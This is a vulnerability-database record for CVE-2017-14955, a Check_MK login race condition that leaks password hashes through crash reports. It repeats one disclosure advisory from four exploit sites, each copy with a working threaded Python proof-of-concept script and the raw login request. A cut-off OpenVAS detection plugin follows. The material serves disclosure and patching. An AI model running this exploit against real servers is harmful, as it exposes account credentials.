ID CVE-2017-14955 Type cve Reporter cve@mitre.org Modified 2019-10-17T13:21:00
Description
Check_MK before 1.2.8p26 mishandles certain errors within the failed-login save feature because of a race condition, which allows remote attackers to obtain sensitive user information by reading a GUI crash report.
{"zdt": [{"lastseen": "2018-01-03T07:02:18", "description": "Exploit for python platform in category web applications", "edition": 1, "published": "2017-10-21T00:00:00", "type": "zdt", "title": "Check_MK 1.2.8p25 - Information Disclosure Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-21T00:00:00", "href": "https://0day.today/exploit/description/28829", "id": "1337DAY-ID-28829", "sourceData": "1. ADVISORY INFORMATION\r\n=======================\r\nProduct: Check_mk\r\nVendor URL: https://mathias-kettner.de/check_mk.html\r\nType: Race Condition [CWE-362]\r\nDate found: 2017-09-21\r\nDate published: 2017-10-18\r\nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\r\nCVE: CVE-2017-14955\r\n \r\n \r\n2. CREDITS\r\n==========\r\nThis vulnerability was discovered and researched by Julien Ahrens from\r\nRCE Security.\r\n \r\n \r\n3. VERSIONS AFFECTED\r\n====================\r\nCheck_mk v1.2.8p25\r\nCheck_mk v1.2.8p25 Enterprise\r\nolder versions may be affected too.\r\n \r\n \r\n4. INTRODUCTION\r\n===============\r\nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios.\r\nCheck_MK is available as Raw Edition, which is 100% pure open source, and as\r\nEnterprise Edition with a lot of additional features and professional support.\r\n \r\n(from the vendor's homepage)\r\n \r\n \r\n5. 
VULNERABILITY DETAILS\r\n========================\r\nCheck_mk is vulnerable to an unauthenticated information disclosure through a\r\nrace condition during the authentication process when trying to authenticate\r\nwith a valid username and an invalid password.\r\n \r\nOn a failed login, the application calls the function save_users(), which\r\nperforms two os.rename operations on the files \"contacts.mk.new\" and\r\n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):\r\n \r\n[..]\r\n # Check_MK's monitoring contacts\r\n filename = root_dir + \"contacts.mk.new\"\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n \r\n # Users with passwords for Multisite\r\n filename = multisite_dir + \"users.mk.new\"\r\n make_nagios_directory(multisite_dir)\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n[...]\r\n \r\nWhen sending many concurrent authentication requests with an existing/valid\r\nusername, such as:\r\n \r\nPOST /check_mk/login.py HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---9519178121294961341040589727\r\nContent-Length: 772\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"filled_in\"\r\n \r\nlogin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n \r\n1\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; 
name=\"_origtarget\"\r\n \r\nindex.py\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_username\"\r\n \r\nomdadmin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_password\"\r\n \r\nwelcome\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n \r\nLogin\r\n---9519178121294961341040589727--\r\n \r\nThen it could happen that one of both os.rename() calls references a non-\r\nexisting file, which has just been renamed by a previous thread. This causes the\r\nPython script to fail and throw a crash report, which discloses a variety of\r\nsensitive information, such as internal server paths, account details including\r\nhashed passwords:\r\n \r\n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',\r\n 'contactgroups': ['all'],\r\n 'disable_notifications': False,\r\n 'email': u'admin@example.com',\r\n 'enforce_pw_change': False,\r\n 'last_pw_change': 0,\r\n 'last_seen': 0.0,\r\n 'locked': False,\r\n 'num_failed': 0,\r\n 'pager': '',\r\n 'password': '$1$400000$13371337asdfasdf',\r\n 'roles': ['admin'],\r\n 'serial': 2},\r\n \r\nA script to automatically exploit this vulnerability can be found on [0].\r\n \r\n6. POC\r\n======\r\n \r\n#!/usr/bin/python\r\n# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition\r\n# Version: <= 1.2.8p25\r\n# Date: 2017-10-18\r\n# Author: Julien Ahrens (@MrTuxracer)\r\n# Homepage: https://www.rcesecurity.com\r\n# Software Link: https://mathias-kettner.de/check_mk.html\r\n# Tested on: 1.2.8p25\r\n# CVE:\t\t CVE-2017-14955\r\n#\r\n# Howto / Notes:\r\n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and\r\n# below as described by CVE-2017-14955. You only need a valid username to\r\n# dump all encrypted passwords and make sure to setup a local proxy to\r\n# catch the dump. 
Happy brute forcing ;-)\r\n \r\nimport requests\r\nimport threading\r\n \r\ntry:\r\n\tfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\trequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nexcept:\r\n\tpass\r\n \r\n# Config Me\r\ntarget_url = \"https://localhost/check_mk/login.py\"\r\ntarget_username = \"omdadmin\"\r\n \r\nproxies = {\r\n 'http': 'http://127.0.0.1:8080',\r\n 'https': 'http://127.0.0.1:8080',\r\n}\r\n \r\ndef make_session():\r\n\tv = requests.post(target_url, verify=False, proxies=proxies, files={'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (None, 'index.py'), '_username': (None, target_username), '_password': (None, 'random'), '_login': (None, 'Login')})\r\n\treturn v.content\r\n \r\nNUM = 50\r\n \r\nthreads = []\r\nfor i in range(NUM):\r\n t = threading.Thread(target=make_session)\r\n threads.append(t)\r\n t.start()\r\n \r\n7. RISK\r\n=======\r\nTo successfully exploit this vulnerability an unauthenticated attacker must only\r\nhave network-level access to the application.\r\n \r\nThe vulnerability allows remote attackers to trigger an exception, which\r\ndiscloses a variety of sensitive internal information such as:\r\n- Local server paths\r\n- Usernames\r\n- Passwords (hashed)\r\n- and user directory-specific attributes (i.e. LDAP)\r\n \r\n \r\n8. SOLUTION\r\n===========\r\nUpdate to 1.2.8p26.\r\n \r\n \r\n9. REPORT TIMELINE\r\n==================\r\n2017-09-21: Discovery of the vulnerability\r\n2017-09-21: Sent limited information to publicly listed email address\r\n2017-09-21: Vendor responds and asks for details\r\n2017-09-21: Full vulnerability details sent to vendor\r\n2017-09-25: Vendor pushes fix to git\r\n2017-10-01: MITRE assigns CVE-2017-14955\r\n2017-10-16: Fix confirmed\r\n2017-10-18: Public disclosure\r\n \r\n \r\n10. 
REFERENCES\r\n=============\r\n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\r\n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/28829", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2017-10-21T22:05:38", "description": "", "published": "2017-10-19T00:00:00", "type": "packetstorm", "title": "Check_mk 1.2.8p25 save_users() Race Condition", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-19T00:00:00", "id": "PACKETSTORM:144689", "href": "https://packetstormsecurity.com/files/144689/Check_mk-1.2.8p25-save_users-Race-Condition.html", "sourceData": "`RCE Security Advisory \nhttps://www.rcesecurity.com \n \n \n1. ADVISORY INFORMATION \n======================= \nProduct: Check_mk \nVendor URL: https://mathias-kettner.de/check_mk.html \nType: Race Condition [CWE-362] \nDate found: 2017-09-21 \nDate published: 2017-10-18 \nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \nCVE: CVE-2017-14955 \n \n \n2. CREDITS \n========== \nThis vulnerability was discovered and researched by Julien Ahrens from \nRCE Security. \n \n \n3. VERSIONS AFFECTED \n==================== \nCheck_mk v1.2.8p25 \nCheck_mk v1.2.8p25 Enterprise \nolder versions may be affected too. \n \n \n4. INTRODUCTION \n=============== \nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios. \nCheck_MK is available as Raw Edition, which is 100% pure open source, and as \nEnterprise Edition with a lot of additional features and professional support. \n \n(from the vendor's homepage) \n \n \n5. 
VULNERABILITY DETAILS \n======================== \nCheck_mk is vulnerable to an unauthenticated information disclosure through a \nrace condition during the authentication process when trying to authenticate \nwith a valid username and an invalid password. \n \nOn a failed login, the application calls the function save_users(), which \nperforms two os.rename operations on the files \"contacts.mk.new\" and \n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py): \n \n[..] \n# Check_MK's monitoring contacts \nfilename = root_dir + \"contacts.mk.new\" \nout = create_user_file(filename, \"w\") \nout.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\") \nout.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts)) \nout.close() \nos.rename(filename, filename[:-4]) \n \n# Users with passwords for Multisite \nfilename = multisite_dir + \"users.mk.new\" \nmake_nagios_directory(multisite_dir) \nout = create_user_file(filename, \"w\") \nout.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\") \nout.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users)) \nout.close() \nos.rename(filename, filename[:-4]) \n[...] 
\n \nWhen sending many concurrent authentication requests with an existing/valid \nusername, such as: \n \nPOST /check_mk/login.py HTTP/1.1 \nHost: localhost \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: multipart/form-data; boundary=---9519178121294961341040589727 \nContent-Length: 772 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"filled_in\" \n \nlogin \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_login\" \n \n1 \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_origtarget\" \n \nindex.py \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_username\" \n \nomdadmin \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_password\" \n \nwelcome \n---9519178121294961341040589727 \nContent-Disposition: form-data; name=\"_login\" \n \nLogin \n---9519178121294961341040589727-- \n \nThen it could happen that one of both os.rename() calls references a non- \nexisting file, which has just been renamed by a previous thread. This causes the \nPython script to fail and throw a crash report, which discloses a variety of \nsensitive information, such as internal server paths, account details including \nhashed passwords: \n \n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator', \n'contactgroups': ['all'], \n'disable_notifications': False, \n'email': u'admin@example.com', \n'enforce_pw_change': False, \n'last_pw_change': 0, \n'last_seen': 0.0, \n'locked': False, \n'num_failed': 0, \n'pager': '', \n'password': '$1$400000$13371337asdfasdf', \n'roles': ['admin'], \n'serial': 2}, \n \nA script to automatically exploit this vulnerability can be found on [0]. \n \n6. 
RISK \n======= \nTo successfully exploit this vulnerability an unauthenticated attacker must only \nhave network-level access to the application. \n \nThe vulnerability allows remote attackers to trigger an exception, which \ndiscloses a variety of sensitive internal information such as: \n- Local server paths \n- Usernames \n- Passwords (hashed) \n- and user directory-specific attributes (i.e. LDAP) \n \n \n7. SOLUTION \n=========== \nUpdate to 1.2.8p26. \n \n \n8. REPORT TIMELINE \n================== \n2017-09-21: Discovery of the vulnerability \n2017-09-21: Sent limited information to publicly listed email address \n2017-09-21: Vendor responds and asks for details \n2017-09-21: Full vulnerability details sent to vendor \n2017-09-25: Vendor pushes fix to git \n2017-10-01: MITRE assigns CVE-2017-14955 \n2017-10-16: Fix confirmed \n2017-10-18: Public disclosure \n \n \n9. REFERENCES \n============= \n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/ \n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 \n \n \nProof of concept: \n \n#!/usr/bin/python \n# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition \n# Version: <= 1.2.8p25 \n# Date: 2017-10-18 \n# Author: Julien Ahrens (@MrTuxracer) \n# Homepage: https://www.rcesecurity.com \n# Software Link: https://mathias-kettner.de/check_mk.html \n# Tested on: 1.2.8p25 \n# CVE: CVE-2017-14955 \n# \n# Howto / Notes: \n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and \n# below as described by CVE-2017-14955. You only need a valid username to \n# dump all encrypted passwords and make sure to setup a local proxy to \n# catch the dump. 
Happy brute forcing ;-) \n \nimport requests \nimport threading \n \ntry: \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nexcept: \npass \n \n# Config Me \ntarget_url = \"https://localhost/check_mk/login.py\" \ntarget_username = \"omdadmin\" \n \nproxies = { \n'http': 'http://127.0.0.1:8080', \n'https': 'http://127.0.0.1:8080', \n} \n \ndef make_session(): \nv = requests.post(target_url, verify=False, proxies=proxies, files={'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (None, 'index.py'), '_username': (None, target_username), '_password': (None, 'random'), '_login': (None, 'Login')}) \nreturn v.content \n \nNUM = 50 \n \nthreads = [] \nfor i in range(NUM): \nt = threading.Thread(target=make_session) \nthreads.append(t) \nt.start() \n \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144689/RCESEC-2017-001.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:08", "description": "\nCheck_MK 1.2.8p25 - Information Disclosure", "edition": 1, "published": "2017-10-18T00:00:00", "title": "Check_MK 1.2.8p25 - Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-18T00:00:00", "id": "EXPLOITPACK:EA6FD12848ADC6DC8FF41880397BDBC2", "href": "", "sourceData": "1. ADVISORY INFORMATION\n=======================\nProduct: Check_mk\nVendor URL: https://mathias-kettner.de/check_mk.html\nType: Race Condition [CWE-362]\nDate found: 2017-09-21\nDate published: 2017-10-18\nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\nCVE: CVE-2017-14955\n\n\n2. CREDITS\n==========\nThis vulnerability was discovered and researched by Julien Ahrens from\nRCE Security.\n\n\n3. 
VERSIONS AFFECTED\n====================\nCheck_mk v1.2.8p25\nCheck_mk v1.2.8p25 Enterprise\nolder versions may be affected too.\n\n\n4. INTRODUCTION\n===============\nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios.\nCheck_MK is available as Raw Edition, which is 100% pure open source, and as\nEnterprise Edition with a lot of additional features and professional support.\n\n(from the vendor's homepage)\n\n\n5. VULNERABILITY DETAILS\n========================\nCheck_mk is vulnerable to an unauthenticated information disclosure through a\nrace condition during the authentication process when trying to authenticate\nwith a valid username and an invalid password.\n\nOn a failed login, the application calls the function save_users(), which\nperforms two os.rename operations on the files \"contacts.mk.new\" and\n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):\n\n[..]\n # Check_MK's monitoring contacts\n filename = root_dir + \"contacts.mk.new\"\n out = create_user_file(filename, \"w\")\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\n out.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts))\n out.close()\n os.rename(filename, filename[:-4])\n\n # Users with passwords for Multisite\n filename = multisite_dir + \"users.mk.new\"\n make_nagios_directory(multisite_dir)\n out = create_user_file(filename, \"w\")\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\n out.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users))\n out.close()\n os.rename(filename, filename[:-4])\n[...]\n\nWhen sending many concurrent authentication requests with an existing/valid\nusername, such as:\n\nPOST /check_mk/login.py HTTP/1.1\nHost: localhost\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; 
boundary=---9519178121294961341040589727\nContent-Length: 772\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"filled_in\"\n\nlogin\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_login\"\n\n1\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_origtarget\"\n\nindex.py\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_username\"\n\nomdadmin\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_password\"\n\nwelcome\n---9519178121294961341040589727\nContent-Disposition: form-data; name=\"_login\"\n\nLogin\n---9519178121294961341040589727--\n\nThen it could happen that one of both os.rename() calls references a non-\nexisting file, which has just been renamed by a previous thread. This causes the\nPython script to fail and throw a crash report, which discloses a variety of\nsensitive information, such as internal server paths, account details including\nhashed passwords:\n\n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',\n 'contactgroups': ['all'],\n 'disable_notifications': False,\n 'email': u'admin@example.com',\n 'enforce_pw_change': False,\n 'last_pw_change': 0,\n 'last_seen': 0.0,\n 'locked': False,\n 'num_failed': 0,\n 'pager': '',\n 'password': '$1$400000$13371337asdfasdf',\n 'roles': ['admin'],\n 'serial': 2},\n\nA script to automatically exploit this vulnerability can be found on [0].\n\n6. 
POC\n======\n\n#!/usr/bin/python\n# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition\n# Version: <= 1.2.8p25\n# Date: 2017-10-18\n# Author: Julien Ahrens (@MrTuxracer)\n# Homepage: https://www.rcesecurity.com\n# Software Link: https://mathias-kettner.de/check_mk.html\n# Tested on: 1.2.8p25\n# CVE:\t\t CVE-2017-14955\n#\n# Howto / Notes:\n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and\n# below as described by CVE-2017-14955. You only need a valid username to\n# dump all encrypted passwords and make sure to setup a local proxy to\n# catch the dump. Happy brute forcing ;-)\n\nimport requests\nimport threading\n\ntry:\n\tfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\trequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nexcept:\n\tpass\n\n# Config Me\ntarget_url = \"https://localhost/check_mk/login.py\"\ntarget_username = \"omdadmin\"\n\nproxies = {\n 'http': 'http://127.0.0.1:8080',\n 'https': 'http://127.0.0.1:8080',\n}\n\ndef make_session():\n\tv = requests.post(target_url, verify=False, proxies=proxies, files={'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (None, 'index.py'), '_username': (None, target_username), '_password': (None, 'random'), '_login': (None, 'Login')})\n\treturn v.content\n\nNUM = 50\n\nthreads = []\nfor i in range(NUM):\n t = threading.Thread(target=make_session)\n threads.append(t)\n t.start()\n\n7. RISK\n=======\nTo successfully exploit this vulnerability an unauthenticated attacker must only\nhave network-level access to the application.\n\nThe vulnerability allows remote attackers to trigger an exception, which\ndiscloses a variety of sensitive internal information such as:\n- Local server paths\n- Usernames\n- Passwords (hashed)\n- and user directory-specific attributes (i.e. LDAP)\n\n\n8. SOLUTION\n===========\nUpdate to 1.2.8p26.\n\n\n9. 
REPORT TIMELINE\n==================\n2017-09-21: Discovery of the vulnerability\n2017-09-21: Sent limited information to publicly listed email address\n2017-09-21: Vendor responds and asks for details\n2017-09-21: Full vulnerability details sent to vendor\n2017-09-25: Vendor pushes fix to git\n2017-10-01: MITRE assigns CVE-2017-14955\n2017-10-16: Fix confirmed\n2017-10-18: Public disclosure\n\n\n10. REFERENCES\n=============\n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2017-10-20T18:30:43", "description": "Check_MK 1.2.8p25 - Information Disclosure. CVE-2017-14955. Webapps exploit for Python platform", "published": "2017-10-18T00:00:00", "type": "exploitdb", "title": "Check_MK 1.2.8p25 - Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14955"], "modified": "2017-10-18T00:00:00", "id": "EDB-ID:43021", "href": "https://www.exploit-db.com/exploits/43021/", "sourceData": "1. ADVISORY INFORMATION\r\n=======================\r\nProduct: Check_mk\r\nVendor URL: https://mathias-kettner.de/check_mk.html\r\nType: Race Condition [CWE-362]\r\nDate found: 2017-09-21\r\nDate published: 2017-10-18\r\nCVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\r\nCVE: CVE-2017-14955\r\n\r\n\r\n2. CREDITS\r\n==========\r\nThis vulnerability was discovered and researched by Julien Ahrens from\r\nRCE Security.\r\n\r\n\r\n3. VERSIONS AFFECTED\r\n====================\r\nCheck_mk v1.2.8p25\r\nCheck_mk v1.2.8p25 Enterprise\r\nolder versions may be affected too.\r\n\r\n\r\n4. 
INTRODUCTION\r\n===============\r\nCheck_MK is comprehensive IT monitoring solution in the tradition of Nagios.\r\nCheck_MK is available as Raw Edition, which is 100% pure open source, and as\r\nEnterprise Edition with a lot of additional features and professional support.\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\n5. VULNERABILITY DETAILS\r\n========================\r\nCheck_mk is vulnerable to an unauthenticated information disclosure through a\r\nrace condition during the authentication process when trying to authenticate\r\nwith a valid username and an invalid password.\r\n\r\nOn a failed login, the application calls the function save_users(), which\r\nperforms two os.rename operations on the files \"contacts.mk.new\" and\r\n\"users.mk.new\" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):\r\n\r\n[..]\r\n # Check_MK's monitoring contacts\r\n filename = root_dir + \"contacts.mk.new\"\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"contacts.update(\\n%s\\n)\\n\" % pprint.pformat(contacts))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n\r\n # Users with passwords for Multisite\r\n filename = multisite_dir + \"users.mk.new\"\r\n make_nagios_directory(multisite_dir)\r\n out = create_user_file(filename, \"w\")\r\n out.write(\"# Written by Multisite UserDB\\n# encoding: utf-8\\n\\n\")\r\n out.write(\"multisite_users = \\\\\\n%s\\n\" % pprint.pformat(users))\r\n out.close()\r\n os.rename(filename, filename[:-4])\r\n[...]\r\n\r\nWhen sending many concurrent authentication requests with an existing/valid\r\nusername, such as:\r\n\r\nPOST /check_mk/login.py HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---9519178121294961341040589727\r\nContent-Length: 772\r\nConnection: 
close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"filled_in\"\r\n\r\nlogin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n\r\n1\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_origtarget\"\r\n\r\nindex.py\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_username\"\r\n\r\nomdadmin\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_password\"\r\n\r\nwelcome\r\n---9519178121294961341040589727\r\nContent-Disposition: form-data; name=\"_login\"\r\n\r\nLogin\r\n---9519178121294961341040589727--\r\n\r\nThen it could happen that one of both os.rename() calls references a non-\r\nexisting file, which has just been renamed by a previous thread. This causes the\r\nPython script to fail and throw a crash report, which discloses a variety of\r\nsensitive information, such as internal server paths, account details including\r\nhashed passwords:\r\n\r\n</pre></td></tr><tr class=\"data odd0\"><td class=\"left\">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',\r\n 'contactgroups': ['all'],\r\n 'disable_notifications': False,\r\n 'email': u'admin@example.com',\r\n 'enforce_pw_change': False,\r\n 'last_pw_change': 0,\r\n 'last_seen': 0.0,\r\n 'locked': False,\r\n 'num_failed': 0,\r\n 'pager': '',\r\n 'password': '$1$400000$13371337asdfasdf',\r\n 'roles': ['admin'],\r\n 'serial': 2},\r\n\r\nA script to automatically exploit this vulnerability can be found on [0].\r\n\r\n6. 
POC\r\n======\r\n\r\n#!/usr/bin/python\r\n# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition\r\n# Version: <= 1.2.8p25\r\n# Date: 2017-10-18\r\n# Author: Julien Ahrens (@MrTuxracer)\r\n# Homepage: https://www.rcesecurity.com\r\n# Software Link: https://mathias-kettner.de/check_mk.html\r\n# Tested on: 1.2.8p25\r\n# CVE:\t\t CVE-2017-14955\r\n#\r\n# Howto / Notes:\r\n# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and\r\n# below as described by CVE-2017-14955. You only need a valid username to\r\n# dump all encrypted passwords and make sure to setup a local proxy to\r\n# catch the dump. Happy brute forcing ;-)\r\n\r\nimport requests\r\nimport threading\r\n\r\ntry:\r\n\tfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\trequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nexcept:\r\n\tpass\r\n\r\n# Config Me\r\ntarget_url = \"https://localhost/check_mk/login.py\"\r\ntarget_username = \"omdadmin\"\r\n\r\nproxies = {\r\n 'http': 'http://127.0.0.1:8080',\r\n 'https': 'http://127.0.0.1:8080',\r\n}\r\n\r\ndef make_session():\r\n\tv = requests.post(target_url, verify=False, proxies=proxies, files={'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (None, 'index.py'), '_username': (None, target_username), '_password': (None, 'random'), '_login': (None, 'Login')})\r\n\treturn v.content\r\n\r\nNUM = 50\r\n\r\nthreads = []\r\nfor i in range(NUM):\r\n t = threading.Thread(target=make_session)\r\n threads.append(t)\r\n t.start()\r\n\r\n7. 
RISK\r\n=======\r\nTo successfully exploit this vulnerability an unauthenticated attacker must only\r\nhave network-level access to the application.\r\n\r\nThe vulnerability allows remote attackers to trigger an exception, which\r\ndiscloses a variety of sensitive internal information such as:\r\n- Local server paths\r\n- Usernames\r\n- Passwords (hashed)\r\n- and user directory-specific attributes (i.e. LDAP)\r\n\r\n\r\n8. SOLUTION\r\n===========\r\nUpdate to 1.2.8p26.\r\n\r\n\r\n9. REPORT TIMELINE\r\n==================\r\n2017-09-21: Discovery of the vulnerability\r\n2017-09-21: Sent limited information to publicly listed email address\r\n2017-09-21: Vendor responds and asks for details\r\n2017-09-21: Full vulnerability details sent to vendor\r\n2017-09-25: Vendor pushes fix to git\r\n2017-10-01: MITRE assigns CVE-2017-14955\r\n2017-10-16: Fix confirmed\r\n2017-10-18: Public disclosure\r\n\r\n\r\n10. REFERENCES\r\n=============\r\n[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\r\n[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955\r\n\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/43021/"}], "openvas": [{"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955"], "description": "Check_MK is prone to a race condition vulnerability which could lead to\ninformation disclosure.", "modified": "2018-10-26T00:00:00", "published": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310140449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140449", "type": "openvas", "title": "Check_MK Information Disclosure Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_check_mk_info_disc_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Check_MK 
Information Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:check_mk_project:check_mk\";\n\nif 